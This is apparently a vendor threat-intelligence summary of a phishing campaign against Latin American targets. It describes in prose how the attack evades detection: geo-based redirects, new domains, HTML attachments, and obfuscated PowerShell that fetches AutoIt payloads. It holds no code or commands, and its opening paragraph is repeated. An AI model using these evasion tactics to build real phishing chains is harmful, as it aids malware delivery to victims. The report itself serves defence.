EXECUTIVE SUMMARY
A recent observation of a phishing campaign targeting the Latin American region has uncovered sophisticated tactics employed by threat actors to conceal malicious activities. The campaign involves phishing emails with attachments disguised as ZIP files, leading to the download of malicious payloads posing as invoices.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
A recent observation of a phishing campaign targeting the Latin American region has uncovered sophisticated tactics employed by threat actors to conceal malicious activities. The campaign involves phishing emails with attachments disguised as ZIP files, leading to the download of malicious payloads posing as invoices.[emaillocker id="1283"]
Upon analysis of the phishing email's header, it was found to originate from an email address format utilizing the domain. Additionally, the usage of Roundcube Webmail was noted, a platform often exploited in phishing endeavors. The attached HTML file contains a concatenated URL, which, when accessed, typically leads to a suspended page. Further investigation revealed that the URL is hosted on an IP address, with associated domains being newly created, some exhibiting ties to Mexico. Notably, when accessed via a Mexico-based IP, the URL redirects to a CAPTCHA page, subsequently leading to the download of a malicious RAR file. Within this file, a PowerShell script was discovered, designed to extract system information, and check for antivirus presence. Base64 encoded strings within the script decoded to reveal URLs for additional malicious downloads, including a ZIP file hosted on Dropbox, containing numerous suspicious files, including executable AutoIt scripts.
The phishing campaign demonstrates a sophisticated approach by threat actors to evade detection and deliver malicious payloads. By employing tactics such as using newly created domains, redirecting based on geographical location, and obfuscating code within attachments, the attackers aim to bypass security measures and exploit unsuspecting targets. It underscores the critical importance of exercising caution when encountering emails with file attachments or URLs, as they may lead to the inadvertent installation of malware. Heightened awareness and robust cybersecurity measures are imperative in mitigating the risks posed by evolving phishing tactics and safeguarding against potential cyber threats.
THREAT PROFILE:
REFERENCES:
The following reports contain further technical details:
https://thehackernews.com/2024/04/cybercriminals-targeting-latin-america.html
[/emaillocker]